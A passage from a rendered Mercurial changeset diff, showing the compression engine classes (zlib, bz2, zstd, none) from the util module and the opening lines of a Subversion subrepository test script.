3205 self._bundletypes[bundletype] = name
3205
3206
3206 wiresupport = engine.wireprotosupport()
3207 wiresupport = engine.wireprotosupport()
3207 if wiresupport:
3208 if wiresupport:
3208 wiretype = wiresupport.name
3209 wiretype = wiresupport.name
3209 if wiretype in self._wiretypes:
3210 if wiretype in self._wiretypes:
3210 raise error.Abort(_('wire protocol compression %s already '
3211 raise error.Abort(_('wire protocol compression %s already '
3211 'registered by %s') %
3212 'registered by %s') %
3212 (wiretype, self._wiretypes[wiretype]))
3213 (wiretype, self._wiretypes[wiretype]))
3213
3214
3214 self._wiretypes[wiretype] = name
3215 self._wiretypes[wiretype] = name
3215
3216
3216 revlogheader = engine.revlogheader()
3217 revlogheader = engine.revlogheader()
3217 if revlogheader and revlogheader in self._revlogheaders:
3218 if revlogheader and revlogheader in self._revlogheaders:
3218 raise error.Abort(_('revlog header %s already registered by %s') %
3219 raise error.Abort(_('revlog header %s already registered by %s') %
3219 (revlogheader, self._revlogheaders[revlogheader]))
3220 (revlogheader, self._revlogheaders[revlogheader]))
3220
3221
3221 if revlogheader:
3222 if revlogheader:
3222 self._revlogheaders[revlogheader] = name
3223 self._revlogheaders[revlogheader] = name
3223
3224
3224 self._engines[name] = engine
3225 self._engines[name] = engine
3225
3226
3226 @property
3227 @property
3227 def supportedbundlenames(self):
3228 def supportedbundlenames(self):
3228 return set(self._bundlenames.keys())
3229 return set(self._bundlenames.keys())
3229
3230
3230 @property
3231 @property
3231 def supportedbundletypes(self):
3232 def supportedbundletypes(self):
3232 return set(self._bundletypes.keys())
3233 return set(self._bundletypes.keys())
3233
3234
3234 def forbundlename(self, bundlename):
3235 def forbundlename(self, bundlename):
3235 """Obtain a compression engine registered to a bundle name.
3236 """Obtain a compression engine registered to a bundle name.
3236
3237
3237 Will raise KeyError if the bundle type isn't registered.
3238 Will raise KeyError if the bundle type isn't registered.
3238
3239
3239 Will abort if the engine is known but not available.
3240 Will abort if the engine is known but not available.
3240 """
3241 """
3241 engine = self._engines[self._bundlenames[bundlename]]
3242 engine = self._engines[self._bundlenames[bundlename]]
3242 if not engine.available():
3243 if not engine.available():
3243 raise error.Abort(_('compression engine %s could not be loaded') %
3244 raise error.Abort(_('compression engine %s could not be loaded') %
3244 engine.name())
3245 engine.name())
3245 return engine
3246 return engine
3246
3247
3247 def forbundletype(self, bundletype):
3248 def forbundletype(self, bundletype):
3248 """Obtain a compression engine registered to a bundle type.
3249 """Obtain a compression engine registered to a bundle type.
3249
3250
3250 Will raise KeyError if the bundle type isn't registered.
3251 Will raise KeyError if the bundle type isn't registered.
3251
3252
3252 Will abort if the engine is known but not available.
3253 Will abort if the engine is known but not available.
3253 """
3254 """
3254 engine = self._engines[self._bundletypes[bundletype]]
3255 engine = self._engines[self._bundletypes[bundletype]]
3255 if not engine.available():
3256 if not engine.available():
3256 raise error.Abort(_('compression engine %s could not be loaded') %
3257 raise error.Abort(_('compression engine %s could not be loaded') %
3257 engine.name())
3258 engine.name())
3258 return engine
3259 return engine
3259
3260
3260 def supportedwireengines(self, role, onlyavailable=True):
3261 def supportedwireengines(self, role, onlyavailable=True):
3261 """Obtain compression engines that support the wire protocol.
3262 """Obtain compression engines that support the wire protocol.
3262
3263
3263 Returns a list of engines in prioritized order, most desired first.
3264 Returns a list of engines in prioritized order, most desired first.
3264
3265
3265 If ``onlyavailable`` is set, filter out engines that can't be
3266 If ``onlyavailable`` is set, filter out engines that can't be
3266 loaded.
3267 loaded.
3267 """
3268 """
3268 assert role in (SERVERROLE, CLIENTROLE)
3269 assert role in (SERVERROLE, CLIENTROLE)
3269
3270
3270 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3271 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3271
3272
3272 engines = [self._engines[e] for e in self._wiretypes.values()]
3273 engines = [self._engines[e] for e in self._wiretypes.values()]
3273 if onlyavailable:
3274 if onlyavailable:
3274 engines = [e for e in engines if e.available()]
3275 engines = [e for e in engines if e.available()]
3275
3276
3276 def getkey(e):
3277 def getkey(e):
3277 # Sort first by priority, highest first. In case of tie, sort
3278 # Sort first by priority, highest first. In case of tie, sort
3278 # alphabetically. This is arbitrary, but ensures output is
3279 # alphabetically. This is arbitrary, but ensures output is
3279 # stable.
3280 # stable.
3280 w = e.wireprotosupport()
3281 w = e.wireprotosupport()
3281 return -1 * getattr(w, attr), w.name
3282 return -1 * getattr(w, attr), w.name
3282
3283
3283 return list(sorted(engines, key=getkey))
3284 return list(sorted(engines, key=getkey))
3284
3285
3285 def forwiretype(self, wiretype):
3286 def forwiretype(self, wiretype):
3286 engine = self._engines[self._wiretypes[wiretype]]
3287 engine = self._engines[self._wiretypes[wiretype]]
3287 if not engine.available():
3288 if not engine.available():
3288 raise error.Abort(_('compression engine %s could not be loaded') %
3289 raise error.Abort(_('compression engine %s could not be loaded') %
3289 engine.name())
3290 engine.name())
3290 return engine
3291 return engine
3291
3292
3292 def forrevlogheader(self, header):
3293 def forrevlogheader(self, header):
3293 """Obtain a compression engine registered to a revlog header.
3294 """Obtain a compression engine registered to a revlog header.
3294
3295
3295 Will raise KeyError if the revlog header value isn't registered.
3296 Will raise KeyError if the revlog header value isn't registered.
3296 """
3297 """
3297 return self._engines[self._revlogheaders[header]]
3298 return self._engines[self._revlogheaders[header]]
3298
3299
3299 compengines = compressormanager()
3300 compengines = compressormanager()
3300
3301
3301 class compressionengine(object):
3302 class compressionengine(object):
3302 """Base class for compression engines.
3303 """Base class for compression engines.
3303
3304
3304 Compression engines must implement the interface defined by this class.
3305 Compression engines must implement the interface defined by this class.
3305 """
3306 """
3306 def name(self):
3307 def name(self):
3307 """Returns the name of the compression engine.
3308 """Returns the name of the compression engine.
3308
3309
3309 This is the key the engine is registered under.
3310 This is the key the engine is registered under.
3310
3311
3311 This method must be implemented.
3312 This method must be implemented.
3312 """
3313 """
3313 raise NotImplementedError()
3314 raise NotImplementedError()
3314
3315
3315 def available(self):
3316 def available(self):
3316 """Whether the compression engine is available.
3317 """Whether the compression engine is available.
3317
3318
3318 The intent of this method is to allow optional compression engines
3319 The intent of this method is to allow optional compression engines
3319 that may not be available in all installations (such as engines relying
3320 that may not be available in all installations (such as engines relying
3320 on C extensions that may not be present).
3321 on C extensions that may not be present).
3321 """
3322 """
3322 return True
3323 return True
3323
3324
3324 def bundletype(self):
3325 def bundletype(self):
3325 """Describes bundle identifiers for this engine.
3326 """Describes bundle identifiers for this engine.
3326
3327
3327 If this compression engine isn't supported for bundles, returns None.
3328 If this compression engine isn't supported for bundles, returns None.
3328
3329
3329 If this engine can be used for bundles, returns a 2-tuple of strings of
3330 If this engine can be used for bundles, returns a 2-tuple of strings of
3330 the user-facing "bundle spec" compression name and an internal
3331 the user-facing "bundle spec" compression name and an internal
3331 identifier used to denote the compression format within bundles. To
3332 identifier used to denote the compression format within bundles. To
3332 exclude the name from external usage, set the first element to ``None``.
3333 exclude the name from external usage, set the first element to ``None``.
3333
3334
3334 If bundle compression is supported, the class must also implement
3335 If bundle compression is supported, the class must also implement
3335 ``compressstream`` and `decompressorreader``.
3336 ``compressstream`` and `decompressorreader``.
3336
3337
3337 The docstring of this method is used in the help system to tell users
3338 The docstring of this method is used in the help system to tell users
3338 about this engine.
3339 about this engine.
3339 """
3340 """
3340 return None
3341 return None
3341
3342
3342 def wireprotosupport(self):
3343 def wireprotosupport(self):
3343 """Declare support for this compression format on the wire protocol.
3344 """Declare support for this compression format on the wire protocol.
3344
3345
3345 If this compression engine isn't supported for compressing wire
3346 If this compression engine isn't supported for compressing wire
3346 protocol payloads, returns None.
3347 protocol payloads, returns None.
3347
3348
3348 Otherwise, returns ``compenginewireprotosupport`` with the following
3349 Otherwise, returns ``compenginewireprotosupport`` with the following
3349 fields:
3350 fields:
3350
3351
3351 * String format identifier
3352 * String format identifier
3352 * Integer priority for the server
3353 * Integer priority for the server
3353 * Integer priority for the client
3354 * Integer priority for the client
3354
3355
3355 The integer priorities are used to order the advertisement of format
3356 The integer priorities are used to order the advertisement of format
3356 support by server and client. The highest integer is advertised
3357 support by server and client. The highest integer is advertised
3357 first. Integers with non-positive values aren't advertised.
3358 first. Integers with non-positive values aren't advertised.
3358
3359
3359 The priority values are somewhat arbitrary and only used for default
3360 The priority values are somewhat arbitrary and only used for default
3360 ordering. The relative order can be changed via config options.
3361 ordering. The relative order can be changed via config options.
3361
3362
3362 If wire protocol compression is supported, the class must also implement
3363 If wire protocol compression is supported, the class must also implement
3363 ``compressstream`` and ``decompressorreader``.
3364 ``compressstream`` and ``decompressorreader``.
3364 """
3365 """
3365 return None
3366 return None
3366
3367
3367 def revlogheader(self):
3368 def revlogheader(self):
3368 """Header added to revlog chunks that identifies this engine.
3369 """Header added to revlog chunks that identifies this engine.
3369
3370
3370 If this engine can be used to compress revlogs, this method should
3371 If this engine can be used to compress revlogs, this method should
3371 return the bytes used to identify chunks compressed with this engine.
3372 return the bytes used to identify chunks compressed with this engine.
3372 Else, the method should return ``None`` to indicate it does not
3373 Else, the method should return ``None`` to indicate it does not
3373 participate in revlog compression.
3374 participate in revlog compression.
3374 """
3375 """
3375 return None
3376 return None
3376
3377
3377 def compressstream(self, it, opts=None):
3378 def compressstream(self, it, opts=None):
3378 """Compress an iterator of chunks.
3379 """Compress an iterator of chunks.
3379
3380
3380 The method receives an iterator (ideally a generator) of chunks of
3381 The method receives an iterator (ideally a generator) of chunks of
3381 bytes to be compressed. It returns an iterator (ideally a generator)
3382 bytes to be compressed. It returns an iterator (ideally a generator)
3382 of bytes of chunks representing the compressed output.
3383 of bytes of chunks representing the compressed output.
3383
3384
3384 Optionally accepts an argument defining how to perform compression.
3385 Optionally accepts an argument defining how to perform compression.
3385 Each engine treats this argument differently.
3386 Each engine treats this argument differently.
3386 """
3387 """
3387 raise NotImplementedError()
3388 raise NotImplementedError()
3388
3389
3389 def decompressorreader(self, fh):
3390 def decompressorreader(self, fh):
3390 """Perform decompression on a file object.
3391 """Perform decompression on a file object.
3391
3392
3392 Argument is an object with a ``read(size)`` method that returns
3393 Argument is an object with a ``read(size)`` method that returns
3393 compressed data. Return value is an object with a ``read(size)`` that
3394 compressed data. Return value is an object with a ``read(size)`` that
3394 returns uncompressed data.
3395 returns uncompressed data.
3395 """
3396 """
3396 raise NotImplementedError()
3397 raise NotImplementedError()
3397
3398
3398 def revlogcompressor(self, opts=None):
3399 def revlogcompressor(self, opts=None):
3399 """Obtain an object that can be used to compress revlog entries.
3400 """Obtain an object that can be used to compress revlog entries.
3400
3401
3401 The object has a ``compress(data)`` method that compresses binary
3402 The object has a ``compress(data)`` method that compresses binary
3402 data. This method returns compressed binary data or ``None`` if
3403 data. This method returns compressed binary data or ``None`` if
3403 the data could not be compressed (too small, not compressible, etc).
3404 the data could not be compressed (too small, not compressible, etc).
3404 The returned data should have a header uniquely identifying this
3405 The returned data should have a header uniquely identifying this
3405 compression format so decompression can be routed to this engine.
3406 compression format so decompression can be routed to this engine.
3406 This header should be identified by the ``revlogheader()`` return
3407 This header should be identified by the ``revlogheader()`` return
3407 value.
3408 value.
3408
3409
3409 The object has a ``decompress(data)`` method that decompresses
3410 The object has a ``decompress(data)`` method that decompresses
3410 data. The method will only be called if ``data`` begins with
3411 data. The method will only be called if ``data`` begins with
3411 ``revlogheader()``. The method should return the raw, uncompressed
3412 ``revlogheader()``. The method should return the raw, uncompressed
3412 data or raise a ``RevlogError``.
3413 data or raise a ``RevlogError``.
3413
3414
3414 The object is reusable but is not thread safe.
3415 The object is reusable but is not thread safe.
3415 """
3416 """
3416 raise NotImplementedError()
3417 raise NotImplementedError()
3417
3418
3418 class _zlibengine(compressionengine):
3419 class _zlibengine(compressionengine):
3419 def name(self):
3420 def name(self):
3420 return 'zlib'
3421 return 'zlib'
3421
3422
3422 def bundletype(self):
3423 def bundletype(self):
3423 """zlib compression using the DEFLATE algorithm.
3424 """zlib compression using the DEFLATE algorithm.
3424
3425
3425 All Mercurial clients should support this format. The compression
3426 All Mercurial clients should support this format. The compression
3426 algorithm strikes a reasonable balance between compression ratio
3427 algorithm strikes a reasonable balance between compression ratio
3427 and size.
3428 and size.
3428 """
3429 """
3429 return 'gzip', 'GZ'
3430 return 'gzip', 'GZ'
3430
3431
3431 def wireprotosupport(self):
3432 def wireprotosupport(self):
3432 return compewireprotosupport('zlib', 20, 20)
3433 return compewireprotosupport('zlib', 20, 20)
3433
3434
3434 def revlogheader(self):
3435 def revlogheader(self):
3435 return 'x'
3436 return 'x'
3436
3437
3437 def compressstream(self, it, opts=None):
3438 def compressstream(self, it, opts=None):
3438 opts = opts or {}
3439 opts = opts or {}
3439
3440
3440 z = zlib.compressobj(opts.get('level', -1))
3441 z = zlib.compressobj(opts.get('level', -1))
3441 for chunk in it:
3442 for chunk in it:
3442 data = z.compress(chunk)
3443 data = z.compress(chunk)
3443 # Not all calls to compress emit data. It is cheaper to inspect
3444 # Not all calls to compress emit data. It is cheaper to inspect
3444 # here than to feed empty chunks through generator.
3445 # here than to feed empty chunks through generator.
3445 if data:
3446 if data:
3446 yield data
3447 yield data
3447
3448
3448 yield z.flush()
3449 yield z.flush()
3449
3450
3450 def decompressorreader(self, fh):
3451 def decompressorreader(self, fh):
3451 def gen():
3452 def gen():
3452 d = zlib.decompressobj()
3453 d = zlib.decompressobj()
3453 for chunk in filechunkiter(fh):
3454 for chunk in filechunkiter(fh):
3454 while chunk:
3455 while chunk:
3455 # Limit output size to limit memory.
3456 # Limit output size to limit memory.
3456 yield d.decompress(chunk, 2 ** 18)
3457 yield d.decompress(chunk, 2 ** 18)
3457 chunk = d.unconsumed_tail
3458 chunk = d.unconsumed_tail
3458
3459
3459 return chunkbuffer(gen())
3460 return chunkbuffer(gen())
3460
3461
3461 class zlibrevlogcompressor(object):
3462 class zlibrevlogcompressor(object):
3462 def compress(self, data):
3463 def compress(self, data):
3463 insize = len(data)
3464 insize = len(data)
3464 # Caller handles empty input case.
3465 # Caller handles empty input case.
3465 assert insize > 0
3466 assert insize > 0
3466
3467
3467 if insize < 44:
3468 if insize < 44:
3468 return None
3469 return None
3469
3470
3470 elif insize <= 1000000:
3471 elif insize <= 1000000:
3471 compressed = zlib.compress(data)
3472 compressed = zlib.compress(data)
3472 if len(compressed) < insize:
3473 if len(compressed) < insize:
3473 return compressed
3474 return compressed
3474 return None
3475 return None
3475
3476
3476 # zlib makes an internal copy of the input buffer, doubling
3477 # zlib makes an internal copy of the input buffer, doubling
3477 # memory usage for large inputs. So do streaming compression
3478 # memory usage for large inputs. So do streaming compression
3478 # on large inputs.
3479 # on large inputs.
3479 else:
3480 else:
3480 z = zlib.compressobj()
3481 z = zlib.compressobj()
3481 parts = []
3482 parts = []
3482 pos = 0
3483 pos = 0
3483 while pos < insize:
3484 while pos < insize:
3484 pos2 = pos + 2**20
3485 pos2 = pos + 2**20
3485 parts.append(z.compress(data[pos:pos2]))
3486 parts.append(z.compress(data[pos:pos2]))
3486 pos = pos2
3487 pos = pos2
3487 parts.append(z.flush())
3488 parts.append(z.flush())
3488
3489
3489 if sum(map(len, parts)) < insize:
3490 if sum(map(len, parts)) < insize:
3490 return ''.join(parts)
3491 return ''.join(parts)
3491 return None
3492 return None
3492
3493
3493 def decompress(self, data):
3494 def decompress(self, data):
3494 try:
3495 try:
3495 return zlib.decompress(data)
3496 return zlib.decompress(data)
3496 except zlib.error as e:
3497 except zlib.error as e:
3497 raise error.RevlogError(_('revlog decompress error: %s') %
3498 raise error.RevlogError(_('revlog decompress error: %s') %
3498 str(e))
3499 str(e))
3499
3500
3500 def revlogcompressor(self, opts=None):
3501 def revlogcompressor(self, opts=None):
3501 return self.zlibrevlogcompressor()
3502 return self.zlibrevlogcompressor()
3502
3503
3503 compengines.register(_zlibengine())
3504 compengines.register(_zlibengine())
3504
3505
3505 class _bz2engine(compressionengine):
3506 class _bz2engine(compressionengine):
3506 def name(self):
3507 def name(self):
3507 return 'bz2'
3508 return 'bz2'
3508
3509
3509 def bundletype(self):
3510 def bundletype(self):
3510 """An algorithm that produces smaller bundles than ``gzip``.
3511 """An algorithm that produces smaller bundles than ``gzip``.
3511
3512
3512 All Mercurial clients should support this format.
3513 All Mercurial clients should support this format.
3513
3514
3514 This engine will likely produce smaller bundles than ``gzip`` but
3515 This engine will likely produce smaller bundles than ``gzip`` but
3515 will be significantly slower, both during compression and
3516 will be significantly slower, both during compression and
3516 decompression.
3517 decompression.
3517
3518
3518 If available, the ``zstd`` engine can yield similar or better
3519 If available, the ``zstd`` engine can yield similar or better
3519 compression at much higher speeds.
3520 compression at much higher speeds.
3520 """
3521 """
3521 return 'bzip2', 'BZ'
3522 return 'bzip2', 'BZ'
3522
3523
3523 # We declare a protocol name but don't advertise by default because
3524 # We declare a protocol name but don't advertise by default because
3524 # it is slow.
3525 # it is slow.
3525 def wireprotosupport(self):
3526 def wireprotosupport(self):
3526 return compewireprotosupport('bzip2', 0, 0)
3527 return compewireprotosupport('bzip2', 0, 0)
3527
3528
3528 def compressstream(self, it, opts=None):
3529 def compressstream(self, it, opts=None):
3529 opts = opts or {}
3530 opts = opts or {}
3530 z = bz2.BZ2Compressor(opts.get('level', 9))
3531 z = bz2.BZ2Compressor(opts.get('level', 9))
3531 for chunk in it:
3532 for chunk in it:
3532 data = z.compress(chunk)
3533 data = z.compress(chunk)
3533 if data:
3534 if data:
3534 yield data
3535 yield data
3535
3536
3536 yield z.flush()
3537 yield z.flush()
3537
3538
3538 def decompressorreader(self, fh):
3539 def decompressorreader(self, fh):
3539 def gen():
3540 def gen():
3540 d = bz2.BZ2Decompressor()
3541 d = bz2.BZ2Decompressor()
3541 for chunk in filechunkiter(fh):
3542 for chunk in filechunkiter(fh):
3542 yield d.decompress(chunk)
3543 yield d.decompress(chunk)
3543
3544
3544 return chunkbuffer(gen())
3545 return chunkbuffer(gen())
3545
3546
3546 compengines.register(_bz2engine())
3547 compengines.register(_bz2engine())
3547
3548
3548 class _truncatedbz2engine(compressionengine):
3549 class _truncatedbz2engine(compressionengine):
3549 def name(self):
3550 def name(self):
3550 return 'bz2truncated'
3551 return 'bz2truncated'
3551
3552
3552 def bundletype(self):
3553 def bundletype(self):
3553 return None, '_truncatedBZ'
3554 return None, '_truncatedBZ'
3554
3555
3555 # We don't implement compressstream because it is hackily handled elsewhere.
3556 # We don't implement compressstream because it is hackily handled elsewhere.
3556
3557
3557 def decompressorreader(self, fh):
3558 def decompressorreader(self, fh):
3558 def gen():
3559 def gen():
3559 # The input stream doesn't have the 'BZ' header. So add it back.
3560 # The input stream doesn't have the 'BZ' header. So add it back.
3560 d = bz2.BZ2Decompressor()
3561 d = bz2.BZ2Decompressor()
3561 d.decompress('BZ')
3562 d.decompress('BZ')
3562 for chunk in filechunkiter(fh):
3563 for chunk in filechunkiter(fh):
3563 yield d.decompress(chunk)
3564 yield d.decompress(chunk)
3564
3565
3565 return chunkbuffer(gen())
3566 return chunkbuffer(gen())
3566
3567
3567 compengines.register(_truncatedbz2engine())
3568 compengines.register(_truncatedbz2engine())
3568
3569
3569 class _noopengine(compressionengine):
3570 class _noopengine(compressionengine):
3570 def name(self):
3571 def name(self):
3571 return 'none'
3572 return 'none'
3572
3573
3573 def bundletype(self):
3574 def bundletype(self):
3574 """No compression is performed.
3575 """No compression is performed.
3575
3576
3576 Use this compression engine to explicitly disable compression.
3577 Use this compression engine to explicitly disable compression.
3577 """
3578 """
3578 return 'none', 'UN'
3579 return 'none', 'UN'
3579
3580
3580 # Clients always support uncompressed payloads. Servers don't because
3581 # Clients always support uncompressed payloads. Servers don't because
3581 # unless you are on a fast network, uncompressed payloads can easily
3582 # unless you are on a fast network, uncompressed payloads can easily
3582 # saturate your network pipe.
3583 # saturate your network pipe.
3583 def wireprotosupport(self):
3584 def wireprotosupport(self):
3584 return compewireprotosupport('none', 0, 10)
3585 return compewireprotosupport('none', 0, 10)
3585
3586
3586 # We don't implement revlogheader because it is handled specially
3587 # We don't implement revlogheader because it is handled specially
3587 # in the revlog class.
3588 # in the revlog class.
3588
3589
3589 def compressstream(self, it, opts=None):
3590 def compressstream(self, it, opts=None):
3590 return it
3591 return it
3591
3592
3592 def decompressorreader(self, fh):
3593 def decompressorreader(self, fh):
3593 return fh
3594 return fh
3594
3595
3595 class nooprevlogcompressor(object):
3596 class nooprevlogcompressor(object):
3596 def compress(self, data):
3597 def compress(self, data):
3597 return None
3598 return None
3598
3599
3599 def revlogcompressor(self, opts=None):
3600 def revlogcompressor(self, opts=None):
3600 return self.nooprevlogcompressor()
3601 return self.nooprevlogcompressor()
3601
3602
3602 compengines.register(_noopengine())
3603 compengines.register(_noopengine())
3603
3604
3604 class _zstdengine(compressionengine):
3605 class _zstdengine(compressionengine):
3605 def name(self):
3606 def name(self):
3606 return 'zstd'
3607 return 'zstd'
3607
3608
3608 @propertycache
3609 @propertycache
3609 def _module(self):
3610 def _module(self):
3610 # Not all installs have the zstd module available. So defer importing
3611 # Not all installs have the zstd module available. So defer importing
3611 # until first access.
3612 # until first access.
3612 try:
3613 try:
3613 from . import zstd
3614 from . import zstd
3614 # Force delayed import.
3615 # Force delayed import.
3615 zstd.__version__
3616 zstd.__version__
3616 return zstd
3617 return zstd
3617 except ImportError:
3618 except ImportError:
3618 return None
3619 return None
3619
3620
3620 def available(self):
3621 def available(self):
3621 return bool(self._module)
3622 return bool(self._module)
3622
3623
3623 def bundletype(self):
3624 def bundletype(self):
3624 """A modern compression algorithm that is fast and highly flexible.
3625 """A modern compression algorithm that is fast and highly flexible.
3625
3626
3626 Only supported by Mercurial 4.1 and newer clients.
3627 Only supported by Mercurial 4.1 and newer clients.
3627
3628
3628 With the default settings, zstd compression is both faster and yields
3629 With the default settings, zstd compression is both faster and yields
3629 better compression than ``gzip``. It also frequently yields better
3630 better compression than ``gzip``. It also frequently yields better
3630 compression than ``bzip2`` while operating at much higher speeds.
3631 compression than ``bzip2`` while operating at much higher speeds.
3631
3632
3632 If this engine is available and backwards compatibility is not a
3633 If this engine is available and backwards compatibility is not a
3633 concern, it is likely the best available engine.
3634 concern, it is likely the best available engine.
3634 """
3635 """
3635 return 'zstd', 'ZS'
3636 return 'zstd', 'ZS'
3636
3637
3637 def wireprotosupport(self):
3638 def wireprotosupport(self):
3638 return compewireprotosupport('zstd', 50, 50)
3639 return compewireprotosupport('zstd', 50, 50)
3639
3640
3640 def revlogheader(self):
3641 def revlogheader(self):
3641 return '\x28'
3642 return '\x28'
3642
3643
3643 def compressstream(self, it, opts=None):
3644 def compressstream(self, it, opts=None):
3644 opts = opts or {}
3645 opts = opts or {}
3645 # zstd level 3 is almost always significantly faster than zlib
3646 # zstd level 3 is almost always significantly faster than zlib
3646 # while providing no worse compression. It strikes a good balance
3647 # while providing no worse compression. It strikes a good balance
3647 # between speed and compression.
3648 # between speed and compression.
3648 level = opts.get('level', 3)
3649 level = opts.get('level', 3)
3649
3650
3650 zstd = self._module
3651 zstd = self._module
3651 z = zstd.ZstdCompressor(level=level).compressobj()
3652 z = zstd.ZstdCompressor(level=level).compressobj()
3652 for chunk in it:
3653 for chunk in it:
3653 data = z.compress(chunk)
3654 data = z.compress(chunk)
3654 if data:
3655 if data:
3655 yield data
3656 yield data
3656
3657
3657 yield z.flush()
3658 yield z.flush()
3658
3659
3659 def decompressorreader(self, fh):
3660 def decompressorreader(self, fh):
3660 zstd = self._module
3661 zstd = self._module
3661 dctx = zstd.ZstdDecompressor()
3662 dctx = zstd.ZstdDecompressor()
3662 return chunkbuffer(dctx.read_from(fh))
3663 return chunkbuffer(dctx.read_from(fh))
3663
3664
3664 class zstdrevlogcompressor(object):
3665 class zstdrevlogcompressor(object):
3665 def __init__(self, zstd, level=3):
3666 def __init__(self, zstd, level=3):
3666 # Writing the content size adds a few bytes to the output. However,
3667 # Writing the content size adds a few bytes to the output. However,
3667 # it allows decompression to be more optimal since we can
3668 # it allows decompression to be more optimal since we can
3668 # pre-allocate a buffer to hold the result.
3669 # pre-allocate a buffer to hold the result.
3669 self._cctx = zstd.ZstdCompressor(level=level,
3670 self._cctx = zstd.ZstdCompressor(level=level,
3670 write_content_size=True)
3671 write_content_size=True)
3671 self._dctx = zstd.ZstdDecompressor()
3672 self._dctx = zstd.ZstdDecompressor()
3672 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3673 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3673 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3674 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3674
3675
3675 def compress(self, data):
3676 def compress(self, data):
3676 insize = len(data)
3677 insize = len(data)
3677 # Caller handles empty input case.
3678 # Caller handles empty input case.
3678 assert insize > 0
3679 assert insize > 0
3679
3680
3680 if insize < 50:
3681 if insize < 50:
3681 return None
3682 return None
3682
3683
3683 elif insize <= 1000000:
3684 elif insize <= 1000000:
3684 compressed = self._cctx.compress(data)
3685 compressed = self._cctx.compress(data)
3685 if len(compressed) < insize:
3686 if len(compressed) < insize:
3686 return compressed
3687 return compressed
3687 return None
3688 return None
3688 else:
3689 else:
3689 z = self._cctx.compressobj()
3690 z = self._cctx.compressobj()
3690 chunks = []
3691 chunks = []
3691 pos = 0
3692 pos = 0
3692 while pos < insize:
3693 while pos < insize:
3693 pos2 = pos + self._compinsize
3694 pos2 = pos + self._compinsize
3694 chunk = z.compress(data[pos:pos2])
3695 chunk = z.compress(data[pos:pos2])
3695 if chunk:
3696 if chunk:
3696 chunks.append(chunk)
3697 chunks.append(chunk)
3697 pos = pos2
3698 pos = pos2
3698 chunks.append(z.flush())
3699 chunks.append(z.flush())
3699
3700
3700 if sum(map(len, chunks)) < insize:
3701 if sum(map(len, chunks)) < insize:
3701 return ''.join(chunks)
3702 return ''.join(chunks)
3702 return None
3703 return None
3703
3704
3704 def decompress(self, data):
3705 def decompress(self, data):
3705 insize = len(data)
3706 insize = len(data)
3706
3707
3707 try:
3708 try:
3708 # This was measured to be faster than other streaming
3709 # This was measured to be faster than other streaming
3709 # decompressors.
3710 # decompressors.
3710 dobj = self._dctx.decompressobj()
3711 dobj = self._dctx.decompressobj()
3711 chunks = []
3712 chunks = []
3712 pos = 0
3713 pos = 0
3713 while pos < insize:
3714 while pos < insize:
3714 pos2 = pos + self._decompinsize
3715 pos2 = pos + self._decompinsize
3715 chunk = dobj.decompress(data[pos:pos2])
3716 chunk = dobj.decompress(data[pos:pos2])
3716 if chunk:
3717 if chunk:
3717 chunks.append(chunk)
3718 chunks.append(chunk)
3718 pos = pos2
3719 pos = pos2
3719 # Frame should be exhausted, so no finish() API.
3720 # Frame should be exhausted, so no finish() API.
3720
3721
3721 return ''.join(chunks)
3722 return ''.join(chunks)
3722 except Exception as e:
3723 except Exception as e:
3723 raise error.RevlogError(_('revlog decompress error: %s') %
3724 raise error.RevlogError(_('revlog decompress error: %s') %
3724 str(e))
3725 str(e))
3725
3726
3726 def revlogcompressor(self, opts=None):
3727 def revlogcompressor(self, opts=None):
3727 opts = opts or {}
3728 opts = opts or {}
3728 return self.zstdrevlogcompressor(self._module,
3729 return self.zstdrevlogcompressor(self._module,
3729 level=opts.get('level', 3))
3730 level=opts.get('level', 3))
3730
3731
3731 compengines.register(_zstdengine())
3732 compengines.register(_zstdengine())
3732
3733
3733 def bundlecompressiontopics():
3734 def bundlecompressiontopics():
3734 """Obtains a list of available bundle compressions for use in help."""
3735 """Obtains a list of available bundle compressions for use in help."""
3735 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3736 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3736 items = {}
3737 items = {}
3737
3738
3738 # We need to format the docstring. So use a dummy object/type to hold it
3739 # We need to format the docstring. So use a dummy object/type to hold it
3739 # rather than mutating the original.
3740 # rather than mutating the original.
3740 class docobject(object):
3741 class docobject(object):
3741 pass
3742 pass
3742
3743
3743 for name in compengines:
3744 for name in compengines:
3744 engine = compengines[name]
3745 engine = compengines[name]
3745
3746
3746 if not engine.available():
3747 if not engine.available():
3747 continue
3748 continue
3748
3749
3749 bt = engine.bundletype()
3750 bt = engine.bundletype()
3750 if not bt or not bt[0]:
3751 if not bt or not bt[0]:
3751 continue
3752 continue
3752
3753
3753 doc = pycompat.sysstr('``%s``\n %s') % (
3754 doc = pycompat.sysstr('``%s``\n %s') % (
3754 bt[0], engine.bundletype.__doc__)
3755 bt[0], engine.bundletype.__doc__)
3755
3756
3756 value = docobject()
3757 value = docobject()
3757 value.__doc__ = doc
3758 value.__doc__ = doc
3758
3759
3759 items[bt[0]] = value
3760 items[bt[0]] = value
3760
3761
3761 return items
3762 return items
3762
3763
3763 # convenient shortcut
3764 # convenient shortcut
3764 dst = debugstacktrace
3765 dst = debugstacktrace
@@ -1,641 +1,705 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
